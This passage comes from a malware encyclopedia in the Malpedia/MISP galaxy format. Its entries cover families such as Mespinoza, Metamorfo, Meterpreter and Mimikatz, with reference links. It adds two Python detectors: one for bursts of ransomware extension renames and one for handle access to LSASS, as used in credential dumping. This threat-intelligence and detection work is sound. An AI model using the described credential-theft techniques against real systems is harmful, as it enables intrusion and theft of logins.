https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/

https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/

MeguminTrojan

Megumin Trojan is malware with several capabilities (DDoS, miner, loader, clipper).

The tag is: misp-galaxy:malpedia="MeguminTrojan"

MeguminTrojan is also known as:

Table 3991. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin

https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

Melcoz

The tag is: misp-galaxy:malpedia="Melcoz"

Melcoz is also known as:

Table 3993. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.melcoz

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

Meow

According to PCrisk, MEOW is ransomware based on the CONTI ransomware. MEOW encrypts files, appends the ".MEOW" extension to their filenames and drops a ransom note named "readme.txt". For example, it renames "1.jpg" to "1.jpg.MEOW", "2.png" to "2.png.MEOW", and so forth.

The tag is: misp-galaxy:malpedia="Meow"

Meow is also known as:

Table 3994. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.meow

https://id-ransomware.blogspot.com/2022/09/meow-ransomware.html

Mespinoza

Mespinoza is ransomware that encrypts files using asymmetric encryption and appends the .pysa file extension. According to dissectingmalware, the extension "pysa" is probably derived from the Zanzibari coin of the same name.
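
The three ransomware entries above (MegaCortex with .aes128ctr and .megac0rtx, Meow with .MEOW, Mespinoza with .pysa) all announce themselves through the extension they append, which is one of the cheapest signals to hunt on. The following Python is an added example, not code from Malpedia or from any of the cited reports: it classifies renamed files by those extensions and raises one alert per host and family when several such renames land within a short window. The rename-event format, host and process names, the sample events, the threshold and the window are all assumptions made for the example; adapt the parser to whatever file-activity telemetry you actually collect.

```python
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Extensions the entries above attribute to each family. Matched case-insensitively,
# so "1.jpg.MEOW" and "q1.xlsx.pysa" both resolve.
RANSOM_EXTENSIONS = {
    ".aes128ctr": "MegaCortex",
    ".megac0rtx": "MegaCortex",
    ".meow": "Meow",
    ".pysa": "Mespinoza",
}

# Constructed sample telemetry in a hypothetical rename-event format (assumption):
#   <ISO timestamp> <host> <process> <old path> -> <new path>
SAMPLE_EVENTS = r"""
2024-05-01T10:00:01 ws01 explorer.exe C:\Users\a\report.docx -> C:\Users\a\report_v2.docx
2024-05-01T10:00:05 fs01 cryptor.exe D:\share\q1.xlsx -> D:\share\q1.xlsx.pysa
2024-05-01T10:00:06 fs01 cryptor.exe D:\share\q2.xlsx -> D:\share\q2.xlsx.pysa
2024-05-01T10:00:07 fs01 cryptor.exe D:\share\q3.xlsx -> D:\share\q3.xlsx.pysa
2024-05-01T10:00:09 fs01 cryptor.exe D:\share\q4.xlsx -> D:\share\q4.xlsx.pysa
2024-05-01T10:05:00 ws02 svc.exe C:\Users\b\1.jpg -> C:\Users\b\1.jpg.MEOW
2024-05-01T11:00:00 ws02 svc.exe C:\Users\b\2.png -> C:\Users\b\2.png.MEOW
2024-05-01T12:00:00 ws03 winlogon.exe C:\temp\a.txt -> C:\temp\a.txt.aes128ctr
2024-05-01T12:00:01 ws03 winlogon.exe C:\temp\b.txt -> C:\temp\b.txt.megac0rtx
2024-05-01T12:00:02 ws03 winlogon.exe C:\temp\c.txt -> C:\temp\c.txt.aes128ctr
"""

EVENT_RE = re.compile(r"^(\S+) (\S+) (\S+) (.+?) -> (.+)$")


def classify(path):
    """Map a Windows file path to a ransomware family by its final extension, or None."""
    return RANSOM_EXTENSIONS.get(ntpath.splitext(path)[1].lower())


def parse_events(text):
    """Parse the rename log into dicts; malformed lines are skipped, not fatal."""
    events = []
    for line in text.strip().splitlines():
        match = EVENT_RE.match(line)
        if not match:
            continue
        ts, host, process, old, new = match.groups()
        events.append({
            "ts": datetime.fromisoformat(ts),
            "host": host,
            "process": process,
            "old": old,
            "new": new,
            "family": classify(new),
        })
    return events


def detect_bursts(events, threshold=3, window=timedelta(seconds=60)):
    """Alert once per (host, family) when at least `threshold` renames to a known
    ransomware extension occur within `window`. A lone match is not enough."""
    by_key = defaultdict(list)
    for event in events:
        if event["family"]:
            by_key[(event["host"], event["family"])].append(event)

    alerts = []
    for (host, family), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        best_count, best_start, start = 0, 0, 0
        # Sliding window: advance `start` until the window fits, remember the densest one.
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if end - start + 1 > best_count:
                best_count, best_start = end - start + 1, start
        if best_count >= threshold:
            alerts.append({
                "host": host,
                "family": family,
                "process": evs[best_start]["process"],
                "count": best_count,
                "first_seen": evs[best_start]["ts"].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

On the constructed sample this raises two alerts: fs01 for Mespinoza (four .pysa renames in four seconds) and ws03 for MegaCortex (both of its extensions count toward the same family), while the two .MEOW renames on ws02 an hour apart stay below the threshold. An extension match on a single file is weak evidence on its own, since users rename things and families change extensions between builds, which is why the burst logic gates the alert; tune the threshold and window against a baseline of your own file servers before relying on it.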

The tag is: misp-galaxy:malpedia="Mespinoza"

Mespinoza is also known as:

  • pysa

Table 3998. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf

https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf

https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/

https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/

https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://twitter.com/inversecos/status/1456486725664993287

https://twitter.com/campuscodi/status/1347223969984897026

https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html

https://www.ic3.gov/Media/News/2021/210316.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/

https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/

MetadataBin

Ransomware.

The tag is: misp-galaxy:malpedia="MetadataBin"

MetadataBin is also known as:

  • Ransomware32

Table 3999. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin

https://id-ransomware.blogspot.com/2020/10/metadata-bin-ransomware.html

Metamorfo

According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.

The tag is: misp-galaxy:malpedia="Metamorfo"

Metamorfo is also known as:

  • Casbaneiro

Table 4001. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo

https://twitter.com/MsftSecIntel/status/1418706916922986504

https://cofense.com/blog/autohotkey-banking-trojan/

https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf

https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerou

https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html

https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md

https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam

https://blog.ensilo.com/metamorfo-avast-abuser

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf

Meterpreter (Windows)

The tag is: misp-galaxy:malpedia="Meterpreter (Windows)"

Meterpreter (Windows) is also known as:

Table 4004. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter

https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/

https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/

http://schierlm.users.sourceforge.net/avevasion.html

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

https://asec.ahnlab.com/ko/26705/

https://blog.morphisec.com/fin7-attacks-restaurant-industry

https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://asec.ahnlab.com/en/56236/

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://explore.group-ib.com/htct/hi-tech_crime_2018

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf

https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence

https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/

https://redcanary.com/blog/getsystem-offsec/

https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea

https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html

https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

http://www.secureworks.com/research/threat-profiles/gold-winter

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf

https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf

https://asec.ahnlab.com/en/53046/

Mewsei

The tag is: misp-galaxy:malpedia="Mewsei"

Mewsei is also known as:

Table 4006. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei

Miancha

The tag is: misp-galaxy:malpedia="Miancha"

Miancha is also known as:

Table 4008. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha

Midas

Midas is ransomware written in C#, a variant of the Thanos ransomware family that emerged in October 2021; it is obfuscated using SmartAssembly. In 2022, Zscaler ThreatLabz analysed an incident in which Midas was deployed slowly over a two-month period. The operators also run their own data leak site as part of a double extortion strategy.

The tag is: misp-galaxy:malpedia="Midas"

Midas is also known as:

Table 4013. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.midas

https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/

https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants

https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/

Mikoponi

The tag is: misp-galaxy:malpedia="Mikoponi"

Mikoponi is also known as:

Table 4014. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi

https://www.anomali.com/blog/targeted-ransomware-activity

MILKMAID

The tag is: misp-galaxy:malpedia="MILKMAID"

MILKMAID is also known as:

Table 4016. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Milum

In August 2019, Kaspersky Lab discovered malware it dubbed Milum (the name is based on internal file name fragments) while investigating an operation it named WildPressure. It is written in C++ and uses the STL, primarily to parse JSON. Functionality includes bidirectional file transfer and remote command execution.

The tag is: misp-galaxy:malpedia="Milum"

Milum is also known as:

Table 4017. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.milum

https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/

https://securelist.com/wildpressure-targets-macos/103072/

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

Mimic Ransomware

According to PCrisk, Mimic is a ransomware-type program. Malware within this classification is designed to encrypt data and demand ransoms for decryption. Evidence suggests that Mimic is based on the leaked CONTI ransomware builder. Mimic campaigns have been observed targeting English and Russian speaking users.

The tag is: misp-galaxy:malpedia="Mimic Ransomware"

Mimic Ransomware is also known as:

Table 4019. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic

https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html

MimiKatz

Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials such as Kerberos tickets. Benjamin Delpy continues to lead Mimikatz development, so the toolset works with the current release of Windows and includes the most up-to-date attacks.

Attackers commonly use Mimikatz to steal credentials and escalate privileges; in most cases endpoint protection and anti-virus software will detect and delete it. Conversely, pentesters use Mimikatz to find and exploit weaknesses in your networks so you can fix them.
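
A practical detection angle for the credential theft described above is the handle Mimikatz has to open on lsass.exe in order to read logon secrets from memory. The following Python is an added example, not part of the Mimikatz project or of any cited report: it scans constructed Sysmon Event ID 10 (ProcessAccess) records and flags processes that obtain a memory-read or full-access handle to LSASS. The access-mask values 0x1010 and 0x1FFFFF are the ones commonly reported for Mimikatz's sekurlsa module and for full-dump tooling respectively, and are used here as heuristics; the allowlist of benign source images, the flattened log layout and the sample events are assumptions made for the example.

```python
import re

# Process access rights from winnt.h that matter for reading LSASS memory.
RIGHTS = {
    0x0010: "PROCESS_VM_READ",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Hypothetical allowlist (assumption): images that legitimately open LSASS on this estate.
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed Sysmon records flattened to key="value" pairs; EventID 10 is ProcessAccess.
SAMPLE_LOG = r"""
EventID="10" UtcTime="2024-05-01 09:00:00" SourceImage="C:\Program Files\Windows Defender\MsMpEng.exe" TargetImage="C:\Windows\system32\lsass.exe" GrantedAccess="0x1010"
EventID="10" UtcTime="2024-05-01 09:01:13" SourceImage="C:\Users\a\AppData\Local\Temp\mk.exe" TargetImage="C:\Windows\system32\lsass.exe" GrantedAccess="0x1010"
EventID="10" UtcTime="2024-05-01 09:02:40" SourceImage="C:\Windows\Temp\pd.exe" TargetImage="C:\Windows\system32\lsass.exe" GrantedAccess="0x1FFFFF"
EventID="10" UtcTime="2024-05-01 09:03:05" SourceImage="C:\Windows\system32\Taskmgr.exe" TargetImage="C:\Windows\system32\lsass.exe" GrantedAccess="0x1400"
EventID="10" UtcTime="2024-05-01 09:04:00" SourceImage="C:\Windows\system32\svchost.exe" TargetImage="C:\Windows\system32\notepad.exe" GrantedAccess="0x1FFFFF"
EventID="1" UtcTime="2024-05-01 09:05:00" Image="C:\Users\a\AppData\Local\Temp\mk.exe" CommandLine="mk.exe"
"""

KV_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_line(line):
    """Turn one flattened record into a dict of its key="value" fields."""
    return dict(KV_RE.findall(line))


def decode_access(mask):
    """Name the tracked rights present in a GrantedAccess mask."""
    return {name for bit, name in RIGHTS.items() if mask & bit}


def evaluate(event):
    """Return an alert for a suspicious handle open on lsass.exe, else None."""
    if event.get("EventID") != "10":
        return None
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "")
    if source.lower() in ALLOWLIST:
        return None
    mask = int(event.get("GrantedAccess", "0"), 16)
    if mask == PROCESS_ALL_ACCESS:
        reason = "full-access handle to LSASS"
    elif mask & PROCESS_VM_READ:
        reason = "memory-read handle to LSASS"
    else:
        return None  # query-only handles are routine and far too noisy to alert on
    return {
        "time": event.get("UtcTime"),
        "source": source,
        "mask": hex(mask),
        "rights": sorted(decode_access(mask)),
        "reason": reason,
    }


def scan(text):
    """Run evaluate() over every record and keep the alerts."""
    alerts = []
    for line in text.strip().splitlines():
        alert = evaluate(parse_line(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

On the sample this flags mk.exe (0x1010, a PROCESS_VM_READ handle from a user-writable temp directory) and pd.exe (0x1FFFFF, full access), ignores the allowlisted Defender engine, the query-only Taskmgr handle and the handle on notepad.exe, and skips the non-ProcessAccess record. Expect noise from security products and Windows components that legitimately read LSASS; the allowlist exists for that, and in production it should be keyed on image path plus signer, not path alone, since a dropper can be copied anywhere.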

The tag is: misp-galaxy:malpedia="MimiKatz"

MimiKatz is also known as:

Table 4020. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups

https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf

https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.secureworks.com/research/threat-profiles/gold-drake

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://asec.ahnlab.com/en/56236/

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.slideshare.net/yurikamuraki5/active-directory-240348605

https://blog.xpnsec.com/exploring-mimikatz-part-1/

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf

https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf

https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf

https://attack.mitre.org/groups/G0011

https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/

https://www.hvs-consulting.de/lazarus-report/

https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-152a

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/

https://www.accenture.com/us-en/blogs/security/ransomware-hades

https://attack.mitre.org/groups/G0096

https://www.secureworks.com/research/threat-profiles/bronze-vinewood

https://attack.mitre.org/groups/G0034

http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle

https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/

https://awakesecurity.com/blog/catching-the-white-stork-in-flight/

https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://twitter.com/swisscom_csirt/status/1354052879158571008

https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/

https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730

https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/

https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://unit42.paloaltonetworks.com/trigona-ransomware-update/

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

https://www.secureworks.com/research/samsam-ransomware-campaigns

https://www.ic3.gov/Media/News/2021/210823.pdf

http://www.secureworks.com/research/threat-profiles/gold-drake

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf

https://www.ic3.gov/Media/News/2021/210527.pdf

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.varonis.com/blog/hive-ransomware-analysis

https://asec.ahnlab.com/ko/39682/

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two

https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel

https://www.intrinsec.com/apt27-analysis/

https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/

https://assets.virustotal.com/reports/2021trends.pdf

https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf

https://noticeofpleadings.com/nickel/

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/

https://asec.ahnlab.com/ko/56256/

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://www.ic3.gov/media/news/2020/200917-1.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.secureworks.com/research/threat-profiles/cobalt-hickman

https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east

https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153

https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks

https://www.secureworks.com/blog/ransomware-deployed-by-adversary

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection

